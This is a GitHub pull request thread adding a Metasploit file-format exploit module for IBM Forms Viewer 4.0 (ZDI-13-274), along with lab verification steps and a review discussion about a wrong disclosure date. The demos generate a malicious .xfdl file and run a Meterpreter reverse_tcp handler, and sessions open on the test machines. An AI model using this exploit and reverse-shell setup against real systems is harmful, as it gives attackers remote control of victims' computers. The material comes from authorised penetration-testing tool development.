Add module for ZDI-13-274 #2804

Merged
merged 4 commits into from
Jan 2, 2014

Conversation

jvazquez-r7
Contributor

Tested against IBM Forms Viewer 4.0 on Windows XP SP3 and Windows 7 SP1.

Download IBM Forms Viewer 4.0 from: https://www14.software.ibm.com/webapp/iwm/web/reg/download.do?source=ESD-LOTUSFORMSTRIAL&S_PKG=CRD9QML&S_TACT=109HD0OW&S_CMP=web_dw_rt_swd&lang=en_US&cp=UTF-8

You will need an IBM login.

Verification

  • Install Windows XP SP3 or Windows 7 SP1
  • Install IBM Forms Viewer 4.0. Verify that the masqform.exe binary version is 8.0.0.266
  • Run the module like in the DEMO
  • Open the file from the vulnerable environment with IBM Forms Viewer; you should enjoy sessions like in the demo

Demo

msf > use exploit/windows/fileformat/ibm_forms_viewer_fontname 
msf exploit(ibm_forms_viewer_fontname) > show options

Module options (exploit/windows/fileformat/ibm_forms_viewer_fontname):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  msf.xfdl         yes       The file name.


Exploit target:

   Id  Name
   --  ----
   0   IBM Forms Viewer 4.0 / Windows XP SP3 / Windows 7 SP1


msf exploit(ibm_forms_viewer_fontname) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ibm_forms_viewer_fontname) > set lhost 192.168.172.1
lhost => 192.168.172.1
msf exploit(ibm_forms_viewer_fontname) > set lport 4444
lport => 4444
msf exploit(ibm_forms_viewer_fontname) > rexploit
[*] Reloading module...

[*] Creating 'msf.xfdl' file ...
[+] msf.xfdl stored at /Users/juan/.msf4/local/msf.xfdl
msf exploit(ibm_forms_viewer_fontname) > use exploit/multi/handler 
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.172.1
lhost => 192.168.172.1
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] Starting the payload handler...
[*] Sending stage (769024 bytes) to 192.168.172.244
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.244:1810) at 2013-12-27 10:57:04 -0600

meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.244 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] Starting the payload handler...
[*] Sending stage (769024 bytes) to 192.168.172.133
[*] Meterpreter session 2 opened (192.168.172.1:4444 -> 192.168.172.133:49195) at 2013-12-27 10:57:47 -0600

meterpreter > getuid
Server username: WIN-RNJ7NBRK9L7\Juan Vazquez
meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.133 - Meterpreter session 2 closed.  Reason: User exit

@wvu
Contributor

wvu commented Jan 2, 2014

Looks like you used the wrong PR number, @jvazquez-r7. :P

@jvazquez-r7
Contributor Author

Absolutely hehe, good catch @wvu-r7, sorry about that!

@wvu
Contributor

wvu commented Jan 2, 2014

Haha, it's okay. Testing this today!

@jvazquez-r7
Contributor Author

Thanks @wvu-r7! Let me know if there is anything!

@wvu
Contributor

wvu commented Jan 2, 2014

Windows 7 SP1:

msf > use exploit/windows/fileformat/ibm_forms_viewer_fontname 
msf exploit(ibm_forms_viewer_fontname) > exploit 

[*] Creating 'msf.xfdl' file ...
[+] msf.xfdl stored at /home/wvu/.msf4/local/msf.xfdl
msf exploit(ibm_forms_viewer_fontname) > use exploit/multi/handler 
msf exploit(handler) > exploit 

[*] Started reverse handler on 10.6.0.198:4444 
[*] Starting the payload handler...
[*] Sending stage (769024 bytes) to 10.6.0.198
[*] Meterpreter session 1 opened (10.6.0.198:4444 -> 10.6.0.198:56356) at 2014-01-02 15:24:09 -0600

meterpreter > 

@wvu
Contributor

wvu commented Jan 2, 2014

Windows XP SP3:

msf exploit(handler) > exploit 

[*] Started reverse handler on 10.6.0.198:4444 
[*] Starting the payload handler...
[*] Sending stage (769024 bytes) to 10.6.0.198
[*] Meterpreter session 2 opened (10.6.0.198:4444 -> 10.6.0.198:34129) at 2014-01-02 15:33:43 -0600

meterpreter > 

]
],
'Privileged' => false,
'DisclosureDate' => 'Apr 03 2008',
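Review bot: the 'DisclosureDate' => 'Apr 03 2008' in this region does not agree with the advisory named in the PR title, ZDI-13-274, whose "13" prefix marks it as a 2013 advisory; set the date to the ZDI publication date and confirm it against the advisory before landing. The adjacent 'Privileged' => false is consistent with a client-side file-format module that runs as whoever opens the .xfdl file.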

Is this really the disclosure date? Thought it was 2013.
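One way to catch this kind of mismatch mechanically, as an added example that is neither the module's code nor Metasploit's own tooling: a small Ruby lint that parses a module's DisclosureDate (Metasploit's "Mon DD YYYY" form, as in the hunk above) and cross-checks its year against the year encoded in a ZDI reference id, where ZDI-13-274 denotes a 2013 advisory. The function names, and the 2013 date used in the usage at the bottom, are constructed for this example; the 'Apr 03 2008' value and the ZDI id come from the PR.

```ruby
require 'date'

# Parse Metasploit's DisclosureDate format ("Mon DD YYYY", e.g. 'Apr 03 2008').
# Returns a Date, or nil when the string is not in that format.
def parse_disclosure_date(str)
  Date.strptime(str, '%b %d %Y')
rescue ArgumentError
  nil
end

# Year implied by a reference id, for the reference types whose ids embed one.
# ZDI ids look like '13-274' (module metadata form of ZDI-13-274), so the
# two-digit prefix gives the advisory's publication year (2013).
# Returns nil for reference types that carry no year (URL, OSVDB, ...).
def reference_year(type, id)
  case type
  when 'ZDI'
    m = id.match(/\A(\d{2})-\d+\z/)
    m && 2000 + m[1].to_i
  end
end

# references: array of [type, id] pairs, as in a module's 'References' metadata.
# Returns a list of human-readable problems; an empty list means the metadata
# is internally consistent.
def disclosure_date_issues(disclosure_date, references)
  date = parse_disclosure_date(disclosure_date)
  return ["DisclosureDate '#{disclosure_date}' is not in 'Mon DD YYYY' format"] if date.nil?

  references.each_with_object([]) do |(type, id), issues|
    year = reference_year(type, id)
    next if year.nil? || year == date.year
    issues << "DisclosureDate year #{date.year} does not match #{type}-#{id} (#{year})"
  end
end

if __FILE__ == $0
  # Values from the PR under review: the date in the hunk and the advisory in the title.
  puts disclosure_date_issues('Apr 03 2008', [['ZDI', '13-274']])
  # A constructed 2013 date for comparison: no issues are reported.
  puts disclosure_date_issues('Dec 05 2013', [['ZDI', '13-274']]).inspect
end
```

The check deliberately reports rather than rewrites: the ZDI prefix pins the year, not the day, so a human still has to look up the advisory's actual publication date. It is limited to ZDI ids on purpose; a CVE id's year is the year the id was assigned, which can legitimately differ from the disclosure year, so the same rule applied to CVEs would produce false positives.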

@jvazquez-r7
Contributor Author

Thanks @wvu-r7! You're the killer! Fixing!

@wvu
Contributor

wvu commented Jan 2, 2014

Has sense! Landing!

wvu added a commit that referenced this pull request Jan 2, 2014
wvu added a commit that referenced this pull request Jan 2, 2014
It was the wrong time to mess with my workflow.
@wvu wvu merged commit eaeb457 into rapid7:master Jan 2, 2014
@jvazquez-r7 jvazquez-r7 deleted the zdi_forms_viewer branch November 18, 2014 15:59